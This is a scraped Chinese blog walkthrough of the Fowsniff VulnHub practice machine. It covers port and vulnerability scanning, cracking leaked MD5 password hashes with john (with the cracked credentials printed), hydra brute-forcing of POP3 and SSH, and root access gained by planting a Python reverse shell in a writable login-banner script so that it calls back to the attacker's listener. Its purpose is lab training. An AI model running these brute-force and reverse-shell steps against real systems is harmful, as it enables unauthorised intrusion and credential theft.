当前位置: 首页 > news >正文

培训网站设计如何拉下对手网站

培训网站设计,如何拉下对手网站,腾讯企业邮箱扫码登录,淘宝网站品牌设计#x1f36c; 博主介绍#x1f468;‍#x1f393; 博主介绍#xff1a;大家好#xff0c;我是 hacker-routing #xff0c;很高兴认识大家~ ✨主攻领域#xff1a;【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】 #x1f389;点赞➕评论➕收藏… 博主介绍‍ 博主介绍大家好我是 hacker-routing 很高兴认识大家~ ✨主攻领域【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】 点赞➕评论➕收藏 养成习惯一键三连 欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋 作者水平有限欢迎各位大佬指点相互学习进步 目录 前言 一、信息收集 1、主机探测 2、端口扫描 3、漏洞扫描 nikto漏洞扫描 nmap漏洞扫描 二、渗透测试信息收集 1、web渗透 2、目录扫描 3、信息收集 4、pop3渗透测试 三、提权 1、信息收集 2、反弹shell 3、flag 前言 靶机精讲之Fowsniff靶机涉及诸多信息收集比如web信息收集、媒体网站信息收集、工具站信息收集、pop3服务器信息收集还涉及john和hydra密码暴力破解crackmapexec密码碰撞ssh的banner脚本提权等可以到vulnhub下载靶机边看视频边实操是一台构思精巧、全面磨练日常渗透技能的的高仿真靶机非常值得学习。 一、信息收集 1、主机探测 发现靶机的IP地址是192.168.31.185 ┌──(rootkali)-[~] └─# arp-scan -l 2、端口扫描 发现开放了22、80、110、143端口发现110端口开放了pop3服务 pop3 是一种 Internet 邮件访问协议它允许用户通过客户端应用程序如电子邮件客户端从邮件服务器接收电子邮件。Dovecot pop3d 是一个开源的 pop3 服务器软件用于提供 pop3 访问服务。 ┌──(root??kali)-[~] └─# nmap -sS -A -p- 192.168.31.185 3、漏洞扫描 nikto漏洞扫描 利用nikto漏洞扫描工具简单地扫描到了一些目录文件访问发现对于渗透测试没有什么价值 ┌──(rootkali)-[~] └─# nikto -h 192.168.31.185nmap漏洞扫描 nmap扫描发现一些目录比如robots.txt关键目录可以尝试访问下还扫描发现了CVE:CVE-2007-6750漏洞以及sql注入漏洞我们后面如果还是对靶场没有什么突破我们到时候就可以回到这里进行验证下。 ┌──(rootkali)-[~] └─# nmap --scriptvuln -p22,80,110,143 192.168.31.185 漏洞CVE:CVE-2007-6750是用于攻击一些恶意网站使其恶意网站瘫痪访问不了的作用有点像ddos攻击感兴趣的师傅们可以尝试一下。 二、渗透测试信息收集 1、web渗透 发现web页面没有找到什么有价值的信息就是告诉我们这个网站被黑客攻击然后网站停运了说什么员工管理员的信息泄露之类的目前看没有什么有价值的 。 右击查看网页源代码没有发现什么隐藏的信息 一般可能会存在框架漏洞但是这里没有发现什么框架漏洞 2、目录扫描 目录扫描发现比之前多了一个/security.txt目录我们尝试访问下 ┌──(root??kali)-[~] └─# dirb http://192.168.31.185 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -X .php,.txthttp://192.168.31.185这是您指定的目标 URL即要进行目录扫描的网站地址。-w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt这个参数用来指定字典文件的位置。在这里您使用了 -w 参数并提供了一个字典文件的路径 /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt。-X .php,.txt这个参数指定了要排除的文件扩展名。在这个命令中您使用 -X 参数并列出了 .php 和 .txt这意味着 Dirb 将会扫描到的 URL 中排除这些特定的文件类型。 /security.txt 这段文本描述了一个名为 “FOWSNIFF” 的组织可能虚构声称他们被 “B1gN1nj4” 攻击并被完全控制pwned。看到这里我们想到开始80端口web页面有一个推特的账号说什么信息泄露的我们可以尝试上网找下信息 3、信息收集 利用Google浏览器查找fowsniffcorp Twitter第一个就是下面的内容这个图片很明显是黑客攻击网站成功以后挂的黑页我们尝试点击FowSniff - Explained. - Pastebin.com 我们发现下面有passwd密码的信息所以我们尝试访问下面的.txt文件查找密码有关的信息 发现很多的账号密码密码进行了加密后面我们需要对密码进行解密操作然后还发现pop3我们开始端口扫描也发现了这个很有可能作者就是要让我们pop3进行登录查看信息 把这些内容保存到文档中 mauerfowsniff:8a28a94a588a95b80163709ab4313aa4 mustikkafowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56 tegelfowsniff:1dc352435fecca338acfd4be10984009 baksteenfowsniff:19f5af754c31f1e2651edde9250d69bb seinafowsniff:90dc16d47114aa13671c697fd506cf26 stonefowsniff:a92b8a29ef1183192e3d35187e0cfabd murstenfowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b paredefowsniff:4d6e42f56e127803285a0a7649b5ab11 scianafowsniff:f7fd98d380735e859f8b2ffbbede5a7e利用hash-identifier发现是MD5加密的我们可以利用john进行解密 ┌──(rootkali)-[~/桌面] └─# hash-identifier 8a28a94a588a95b80163709ab4313aa4########################################################################## __ __ __ ______ _____ ## /\ \/\ \ /\ \ /\__ _\ /\ _ \ ## \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ ## \ \ _ \ /__\ / ,__\ \ \ _ \ \ \ \ \ \ \ \ \ ## \ \ \ \ \/\ \_\ \_/\__, \ \ \ \ \ \ \_\ \__ \ \ \_\ \ ## \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ ## \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 ## By Zion3R ## www.Blackploit.com ## RootBlackploit.com ########################################################################## --------------------------------------------------Possible Hashs: [] MD5 [] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))用john破解一下指定字典为rockyou.txt ┌──(rootkali)-[~/桌面] └─# john --formatRAW-MD5 --wordlist/usr/share/wordlists/rockyou.txt hash4、pop3渗透测试 把利用john解密出来的保存到pop3hash文件中 ┌──(rootkali)-[~/桌面] └─# vim pop3hash ┌──(rootkali)-[~/桌面] └─# cat pop3hash scoobydoo2 (seinafowsniff) orlando12 (paredefowsniff) apples01 (tegelfowsniff) skyler22 (baksteenfowsniff) mailcall (mauerfowsniff) 07011972 (scianafowsniff) carp4ever (murstenfowsniff) bilbo101 (mustikkafowsniff)将用户信息和密码信息分别保存 ┌──(rootkali)-[~/桌面] └─# cat pop3hash | awk -F {print $1} 1 ⨯ 1 ⚙ scoobydoo2 orlando12 apples01 skyler22 mailcall 07011972 carp4ever bilbo101┌──(rootkali)-[~/桌面] └─# cat pop3hash | awk -F {print $1} pop3pwd 1 ⚙┌──(rootkali)-[~/桌面] └─# cat pop3hash | awk -F {print $2} | awk -F {print $1} 1 ⚙ (seina (parede (tegel (baksteen (mauer (sciana (mursten (mustikka┌──(rootkali)-[~/桌面] └─# cat pop3hash | awk -F {print $2} | awk -F {print $1} | awk -F ( {print $2} 1 ⚙ seina parede tegel baksteen mauer sciana mursten mustikka┌──(rootkali)-[~/桌面] └─# cat pop3hash | awk -F {print $2} | awk -F {print $1} | awk -F ( {print $2} pop3usrs 1 ⚙┌──(rootkali)-[~/桌面] └─# ls 1 ⚙ CTF Docker hash pop3hash pop3usrs pop3pwd 如今我们已经有了pop3登录的账号和密码了我们就可以利用hydra九头蛇进行爆破了 发现账号是seina 密码是scoobydoo2 ┌──(rootkali)-[~/桌面] └─# hydra -L pop3usrs -P pop3pwd 192.168.31.185 pop3发现pop3登录成功了 ┌──(rootkali)-[~/桌面] └─# telnet 192.168.31.185 110 255 ⨯ Trying 192.168.31.185... Connected to 192.168.31.185. Escape character is ^]. OK Welcome to the Fowsniff Corporate Mail Server! user seina OK pass scoobydoo2 OK Logged in. 获取邮件数量和大小 stat // 获取邮件数量和总大小 list // 列出所有邮件的编号和大小 retr 邮件编号 // 检索指定邮件内容 top 邮件编号 行数 // 检索指定邮件的前几行内容查看第一个邮件内容发现stone用户邮件里面有ssh临时登录的密码 list OK 2 messages: 1 1622 2 1280 . retr 1 这是一封来自 “stonefowsniff” 的邮件以下是邮件中的一些重要信息 发件人From: stonefowsniff收件人To: baksteenfowsniff, mauerfowsniff, murstenfowsniff, mustikkafowsniff, paredefowsniff, scianafowsniff, seinafowsniff, tegelfowsniff主题Subject: URGENT! Security EVENT!日期Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)正文内容邮件提醒公司内部系统遭到恶意攻击攻击者利用 SQL 数据库中错误过滤的转义字符来访问登录凭据。为了重新建设系统安全暂时转移到仅具有最小功能的临时服务器但只能通过 SSH 访问该服务器。SSH 的临时密码为 “S1ck3nBluffsecureshell”并强调需要尽快更改密码。 查看第二封邮件 这是一封来自 “baksteenfowsniff” 的邮件以下是邮件中的一些重要信息 发件人From: baksteenfowsniff收件人Toseinafowsniff主题SubjectYou missed out!日期DateTue, 13 Mar 2018 14:54:05 -0400 (EDT)正文内容邮件内容提到关于 AJ 的一次会议中发生了一些有趣的事情AJ 被大家批评了一番。提到 AJ 曾在海军服役并且一直用粗俗的语言表达自己的情绪。邮件内容还提到发件人开始感到不舒服了可能也染上了 Devin 带回来的肺炎希望 Devin 能迅速康复并提醒 Devin 更改邮箱密码。 我们可以尝试利用hydra九头蛇利用刚才找到的临时ssh密码去进行与pop3usrs文件里面的账号进行爆破尝试登录ssh因为刚才两封邮件里面的账户都是pop3usrs里面的账户 [22][ssh] host: 192.168.31.185 login: baksteen password: S1ck3nBluffsecureshell┌──(rootkali)-[~/桌面] └─# vim pop3pwd 255 ⨯ 2 ⚙┌──(rootkali)-[~/桌面] └─# hydra -L pop3usrs -P pop3pwd 192.168.31.185 sshssh登录成功 ┌──(rootkali)-[~/桌面] └─# ssh baksteen192.168.31.185 2 ⚙ The authenticity of host 192.168.31.185 (192.168.31.185) cant be established. ECDSA key fingerprint is SHA256:5i4lzzyTeroRL7skmPatRi24vG159KMgqHGLyxre9Y. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 192.168.31.185 (ECDSA) to the list of known hosts. baksteen192.168.31.185s password: _____ _ __ __ :sdddddddddddddddy | ___|____ _____ _ __ (_)/ _|/ _| :yNMMMMMMMMMMMMMNmhsso | |_ / _ \ \ /\ / / __| _ \| | |_| |_ .sdmmmmmNmmmmmmmNdyssssso | _| (_) \ V V /\__ \ | | | | _| _| -: y. dssssssso |_| \___/ \_/\_/ |___/_| |_|_|_| |_| -: y. dssssssso ____ -: y. dssssssso / ___|___ _ __ _ __ -: y. dssssssso | | / _ \| __| _ \ -: o. dssssssso | |__| (_) | | | |_) | _ -: o. yssssssso \____\___/|_| | .__/ (_) -: .mdddddddmyyyyyhy: |_| -: -odMMMMMMMMMMmhhdy/. .ohdddddddddddddho: Delivering Solutions**** Welcome to the Fowsniff Corporate Server! **** ---------- NOTICE: ----------* Due to the recent security breach, we are running on a very minimal system.* Contact AJ Stone -IMMEDIATELY- about changing your email and SSH passwords.New release 18.04.6 LTS available. Run do-release-upgrade to upgrade to it.Last login: Tue Mar 13 16:55:40 2018 from 192.168.7.36 baksteenfowsniff:~$ 三、提权 1、信息收集 sudo提权和crontab自动化任务都没有什么提权的点 baksteenfowsniff:~$ sudo -l [sudo] password for baksteen: Sorry, user baksteen may not run sudo on fowsniff. baksteenfowsniff:~$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you dont have to run the crontab # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do.SHELL/bin/sh PATH/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin# m h dom mon dow user command 17 * * * * root cd / run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / run-parts --report /etc/cron.monthly ) # baksteenfowsniff:~$ 本来想到家目录查找一下提权的信息但是都没有权限没有找到有价值的信息 baksteenfowsniff:/home$ pwd /home baksteenfowsniff:/home$ ls baksteen mauer mursten mustikka parede sciana seina stone tegel baksteenfowsniff:/home$ cd seina -bash: cd: seina: Permission denied baksteenfowsniff:/home$ cd mauer -bash: cd: mauer: Permission denied baksteenfowsniff:/home$ cd tegel -bash: cd: tegel: Permission denied baksteenfowsniff:/home$ SUID提权也没有找到能够直接提权的命令 baksteenfowsniff:/home$ find / -user root -perm -4000 -print 2/dev/null /bin/mount /bin/fusermount /bin/umount /bin/ping /bin/su /bin/ntfs-3g /bin/ping6 /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/bin/newgrp /usr/bin/gpasswd /usr/bin/chfn /usr/bin/passwd /usr/bin/procmail /usr/bin/sudo /usr/bin/chsh尝试内核提权也没有成功 baksteenfowsniff:/home$ uname -a Linux fowsniff 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux后来是查看大佬的博客发现是找可写入的文件中然后尝试反弹shell 我们这里需要注意一个小细节我们需要先切换到/usr目录下具有可写入权限 baksteenfowsniff:/usr$ find / -writable -type f -not -path /proc/* -not -path /sys/* -not -path /var/* 2/dev/null /opt/cube/cube.sh /home/baksteen/.cache/motd.legal-displayed /home/baksteen/Maildir/dovecot-uidvalidity /home/baksteen/Maildir/dovecot.index.log /home/baksteen/Maildir/new/1520967067.V801I23764M196461.fowsniff /home/baksteen/Maildir/dovecot-uidlist /home/baksteen/.viminfo /home/baksteen/.bash_history /home/baksteen/.lesshsQ /home/baksteen/.bash_logout /home/baksteen/term.txt /home/baksteen/.profile /home/baksteen/.bashrc baksteenfowsniff:/usr$ 我们这里查看下/opt/cube/cube.sh文件的权限发现是可以写入的权限我们发现这个文件就是我们开始ssh登录进去的页面所以说这个文件就是当ssh远程登录的时候我们拿kali监听可以尝试写入反弹shell的木马进去然后得到root权限。 baksteenfowsniff:/usr$ ls -la /opt/cube/cube.sh -rw-rwxr-- 1 parede users 851 Mar 11 2018 /opt/cube/cube.sh baksteenfowsniff:/usr$ cat /opt/cube/cube.sh printf _____ _ __ __ :sdddddddddddddddy | ___|____ _____ _ __ (_)/ _|/ _| :yNMMMMMMMMMMMMMNmhsso | |_ / _ \ \ /\ / / __| _ \| | |_| |_ .sdmmmmmNmmmmmmmNdyssssso | _| (_) \ V V /\__ \ | | | | _| _| -: y. dssssssso |_| \___/ \_/\_/ |___/_| |_|_|_| |_| -: y. dssssssso ____ -: y. dssssssso / ___|___ _ __ _ __ -: y. dssssssso | | / _ \| __| _ \ -: o. dssssssso | |__| (_) | | | |_) | _ -: o. yssssssso \____\___/|_| | .__/ (_) -: .mdddddddmyyyyyhy: |_| -: -odMMMMMMMMMMmhhdy/. .ohdddddddddddddho: Delivering Solutions\n\nbaksteenfowsniff:/usr$ 2、反弹shell 这里给师傅们推荐一个蛮好用的自动化写反弹shell木马的网站页面也是蛮好看的一个网站我这里选择python3进行反弹shell。 Online - Reverse Shell GeneratorOnline Reverse Shell generator with Local Storage functionality, URI Base64 Encoding, MSFVenom Generator, and Raw Mode. Great for CTFs.https://www.revshells.com/ python3 -c import socket,subprocess,os;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.31.225,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(/bin/bash)┌──(rootkali)-[~/桌面] └─# nc -lvnp 1234 1 ⚙ listening on [any] 1234 ...┌──(rootkali)-[~/桌面] └─# ssh baksteen192.168.31.185 baksteen192.168.31.185s password: 3、flag 反弹shell成功成功拿到root权限 ┌──(rootkali)-[~] └─# nc -lvnp 1234 listening on [any] 1234 ... connect to [192.168.31.225] from (UNKNOWN) [192.168.31.185] 59410 rootfowsniff:/# id id uid0(root) gid0(root) groups0(root) rootfowsniff:/# whoami whoami root rootfowsniff:/# cd /root cd /root rootfowsniff:/root# ls -la ls -la total 28 drwx------ 4 root root 4096 Mar 9 2018 . drwxr-xr-x 22 root root 4096 Feb 16 11:17 .. -rw-r--r-- 1 root root 3117 Mar 9 2018 .bashrc drwxr-xr-x 2 root root 4096 Mar 9 2018 .nano -rw-r--r-- 1 root root 148 Aug 17 2015 .profile drwx------ 5 root root 4096 Mar 9 2018 Maildir -rw-r--r-- 1 root root 582 Mar 9 2018 flag.txt rootfowsniff:/root# cat flag.txt cat flag.txt___ _ _ _ _ _ / __|___ _ _ __ _ _ _ __ _| |_ _ _| |__ _| |_(_)___ _ _ __| || (__/ _ \ \/ _ | _/ _ | _| || | / _ | _| / _ \ \(_-_|\___\___/_||_\__, |_| \__,_|\__|\_,_|_\__,_|\__|_\___/_||_/__(_)|___/ (_)|--------------||| R O O T || F L A G ||||--------------||||||---Nice work!This CTF was built with love in every byte by berzerk0 on Twitter.Special thanks to psf, nbulischeck and the whole Fofao Team.rootfowsniff:/root#
http://www.zqtcl.cn/news/355944/

相关文章:

  • 丹东有做公司网站的吗搜索引擎 wordpress
  • 做网站代理国内课程网站建设现状
  • 中国建设银行手机网站下载从零开始建设企业网站
  • 网站友情链接怎么弄seo平台
  • 建设网站一定要备案吗嘉兴做网站设计
  • 如何制作营销网站模板做外贸需要关注的网站有什么好处
  • 东莞勒流网站制作wordpress 自定义字段 查询
  • 温州网站开发风格做影视剧组演员垂直平台网站
  • c 网站开发培训怎么做网站的站点地图
  • html 网站模板简单网站制作北京海淀
  • 大庆做网站找谁珠海网站搭建
  • 网站建设方面的外文宿迁房产网找房
  • 运营 网站遵义网站开发制作公司
  • 动力论坛源码网站后台地址是什么网站上微信支付功能
  • 网站需求分析模板深圳3d制作
  • 宿迁网站建设推广公司wordpress忘记密码了
  • 成都双语网站开发flat wordpress
  • 大连做公司网站的公司网络营销的网站
  • 做网站 人工智能怎么做商业服务网站
  • 自助建站公司四平市住房和城乡建设部网站
  • 淄博网站seo价格世界新闻最新消息
  • 网站开发 毕业答辩pptwordpress qq邮箱订阅
  • 国家icp备案网站群辉域名登录wordpress
  • 仙居住房和城乡建设规划局网站可以做思维导图的网站
  • 企业网站建设费怎么入账石家庄定制网站建设服务
  • 遂宁建设网站如何搭建微信公众号平台
  • 咖啡网站源码公司网站手机版
  • 新能源网站开发网站做5级分销合法吗
  • 西安建设网站排名简约风网站首页怎么做
  • 安远做网站做服务网站要多少钱